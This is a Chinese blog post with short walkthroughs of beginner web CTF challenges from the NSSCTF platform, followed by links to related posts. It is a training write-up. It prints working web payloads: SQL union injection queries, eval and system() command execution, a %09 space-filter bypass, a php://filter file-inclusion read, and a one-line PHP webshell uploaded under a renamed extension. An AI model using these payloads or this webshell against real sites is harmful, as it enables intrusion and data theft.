nss第一页

最新推荐文章于 2024-09-22 15:35:08 发布
最新推荐文章于 2024-09-22 15:35:08 发布
阅读量709 收藏 13
点赞数 24
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79591714/article/details/141369415
版权

1、[SWPUCTF 2021 新生赛]gift_F12

这题flag藏在前端的源码里,只需要查看源码就好了

最后改成题目所需要的flag形式

2、[SWPUCTF 2021 新生赛]jicao

打开这题,这题是一个php代码审计的题目,然后的话,这里主要来看一下 json_decode 这个函数,

首先这个函数接收两个参数

第一个参数:带解码的JSON字符串

第二个参数:是一个布尔值(默认设置为false),当为true时候,将JSON对象解码为关联数组;当为false的时候结尾为php对象

例如:

$json = json_decode('{"name":"John","age":30}', true);

当第二个参数为true时候,经过json_decode后 :——>Array( [name] => John [age] => 30)

$json = json_decode('{"name":"John","age":30}', false);

当第二个参数为false时候,就得到一个php类,此时就可以通过类调用成员属性,如$ json->name=John

最后的payload:

GET:json={"x":"wllm"}

POST:id=wllmNB

3、[SWPUCTF 2021 新生赛]easy_md5

看到md5就直接用数组绕过了,注意传参方式就行了

payload:

GET:name[]=1

POST:password[]=12

4、[SWPUCTF 2021 新生赛]include

开始提示传一个file进去,用file作为参数然后用get请求传进去就来到上面这个页面

最后看到一个 include_once 函数,就知道要文件包含了,

data协议我用了好像没有反应,最后用?file=php://filter就出来了,最后拿去base64解码

payload:GET:file=php://filter/read=convert.base64-encode/resource=flag.php

5、[SWPUCTF 2021 新生赛]easy_sql

这题是一道sql注入,额,过滤了#号,用--+代替就行了,其他都是常规操作

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

test_tb,users

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb'--+

id,flag

-1' union select 1,2,flag from test_tb

6、[SWPUCTF 2021 新生赛]easyrce

 

通过url控制eval的参数,所有直接执行系统命令,传入

system('ls /');

payload:?url=system('cat /flllllaaaaaaggggggg');

7、[SWPUCTF 2021 新生赛]caidao

这题打开有个一句话木马,直接蚁剑连接,也可以通过命令执行来拿flag

8、[SWPUCTF 2021 新生赛]Do_you_know_http

这题用bp抓包,然后改user-agent 和 X-Forwarded-For就行了

9、[LitCTF 2023]我Flag呢?

这题直接查看源码就出来了

10、[SWPUCTF 2021 新生赛]babyrce

跟着题目来,在http头传一个cookie:amdin=1(注意cookie中的参数之间用分号隔开),接着就出现了下面这个页面

访问rasalghul.php

最后有个命令执行函数,参数过滤了空格,使用 ${IFS}或者%09绕过空格就行了

最后的payload:rasalghul.php?url=cat%09/flllllaaaaaaggggggg

11、 [第五空间 2021]WebFTP

这用御剑扫描出来了phpinfo.php

然后访问这个文件,最后搜索关键字,nssctf就可以看到flag了·

12、[SWPUCTF 2021 新生赛]easyupload2.0

这题的话直接在文件里放一个马,然后文件名过滤了php后缀,直接改成phtml就行了

最后用蚁剑连接

13、[LitCTF 2023]PHP是世界上最好的语言!!

这题直接复制输出内容就行了

如果有不成功的话就写入

13、[SWPUCTF 2021 新生赛]easyupload1.0

传马:

<?= eval($_POST[1]);?>

改后缀,最后访问

/upload/2.php

命令执行

post:

1=system('cat /var/www/html/flag.php');

有个pwn梦
关注
NSS安装软件
05-05
NSS,全称是 Nokia Software Suite,是诺基亚公司推出的一款专业手机管理软件,主要用于诺基亚手机的刷机、升级、数据备份与恢复等操作。这款软件对于诺基亚手机用户来说是非常实用的工具,能够帮助用户轻松管理自己...
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 4357
NSSCTF-Web安全入门-wp
NSSCTF reverse题目解析(详细版)持续更新
ZJPC007的博客
11-24 3308
附件是一个.py文件原代码的含义是将list[]数组进行操作得到一个key利用key和flag进行异或操作,得到16进制的result所以可以得到大致的逆向代码框架重点就是对以下语句进行逆向该语句的含义是keyhex()[2:]zfill(2)因此的到逆向语句这里要注意的就是16进制和字符间的转换int(string,16)的功能就是将16进制转为10进制因此得到完整的脚本。
NSSCTF刷题篇1
最新发布
weixin_74427106的博客
09-22 892
这是一道js信息泄露的题目直接查看源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码注意要将数字之间的空格去掉。
NSSCTF实战:Apache HTTPD 多后缀解析漏洞
weixin_52270928的博客
05-17 621
Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析。
NSSCTF web学习
akxnxbshai的博客
09-30 1287
NSSCTF web刷题
NSSCTF
weixin_43896504的博客
07-22 2813
NSSCTF
NSS103815 下载啊
01-08
【标题】"NSS103815 下载啊" 提供的信息似乎是一个下载链接或者一个文件包的名称,但具体的内容没有明确说明。通常情况下,这样的命名可能是指某个特定的软件版本或者是某个项目的编号。然而,由于缺乏详细信息,...
AddressBook:NSS C8 (P1-W6) 地址簿分配
06-23
"NSS C8 (P1-W6)"可能是课程或项目的一部分,暗示这是一个关于网络系统安全NSS)的第八个单元,可能是第六周的工作内容。下面我们将深入探讨JavaScript在实现地址簿分配中的关键知识点。 1. **对象与数据结构**:...
Market-App:NSS C8 (P1-W5) 市场应用分配
06-26
"Market-App:NSS C8 (P1-W5) 市场应用分配"的标题和描述暗示了这是一个关于市场应用的项目,可能涉及到 NSS C8(可能是课程编号或项目阶段)的第五周工作内容,重点是市场应用的分配或部署。 JavaScript 是前端开发...
fill-me-in:NSS cohort 8 session 1 项目正在进行中
06-14
NSS (可能是指某编程训练营或学习小组) 的第八期学员中,Session 1 的项目正在如火如荼地进行。这个项目可能涉及到 JavaScript,一个广泛用于网页开发和构建动态交互式应用的编程语言。JavaScript 以其灵活性、...
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
nssctf web 入门(6)
qq_61988806的博客
04-17 1312
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
Aluxian_的博客
04-26 2489
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1225
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
nssctf-web2023小白入门篇(详解)
m0_63641882的博客
11-04 823
进行解密得到:NSSCTF{4[]b0[]8[]5[]0[]1[]6[]-8[]ace-4[]1[]0[]7[]-8[]4[]d0[]-1[]da4[]1[]ab1[]0[]8[]ba}---------------------------------------------------------------又是收获满满的一天。根据题目提示进行传参就可以了。
[SWPU CTF]之Misc篇(NSSCTF)刷题记录⑥
Aluxian_的博客
05-01 2393
第十二张图: 新闻联播 一般我晚上 7点或者19.00。第一张图:20%和80% 猜测可能是 28或82。第三张图:而立之年 30而立嘛 肯是30。第二张图:一张八卦图 猜测是08。第六张图:飞机歼-20 20。第七张图:两只黄鹂鸣翠柳 02。第八张图:一起去看流星雨 17。第四张图:北斗七星图 07。第五张图:江南四大才子 04。第十一张图:12星座 12。第十张图:一马当先 01。第九张图:乔丹 23。
NSSCTFWeb篇刷题记录(12)
Aluxian_的博客
05-23 1840
【代码】NSSCTFWeb篇刷题记录(12)
NSSCTF刷题记录
kindyyy的博客
03-13 918
NSSctf的刷题记录,有错误欢迎指正
linux nss
02-01
Linux NSS(Name Service Switch)是一个用于管理系统名称解析的模块化框架。它允许系统管理员配置不同的名称解析服务,如DNS、LDAP、NIS等,并根据需要进行切换。 NSS的主要功能是将不同的名称解析服务统一起来,使得应用程序可以通过统一的接口进行名称解析,而不需要关心具体使用了哪种名称解析服务。这样可以提高系统的灵活性和可扩展性。 在Linux系统中,NSS由一系列动态链接库(.so文件)组成,每个库对应一个特定的名称解析服务。当应用程序需要进行名称解析时,它会调用NSS接口,NSS会根据配置文件中的优先级顺序选择合适的库进行解析。 NSS的配置文件是/etc/nsswitch.conf,其中定义了不同类型的名称解析服务的优先级顺序。例如,hosts条目定义了主机名解析服务的优先级顺序,默认情况下是先使用/etc/hosts文件进行解析,然后再使用DNS进行解析。 除了主机名解析外,NSS还可以管理其他类型的名称解析,如用户和组信息、密码和身份验证等。通过配置nsswitch.conf文件,管理员可以根据实际需求选择合适的名称解析服务。 总结一下,Linux NSS是一个模块化的名称解析框架,它允许系统管理员配置不同的名称解析服务,并提供统一的接口供应用程序进行名称解析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值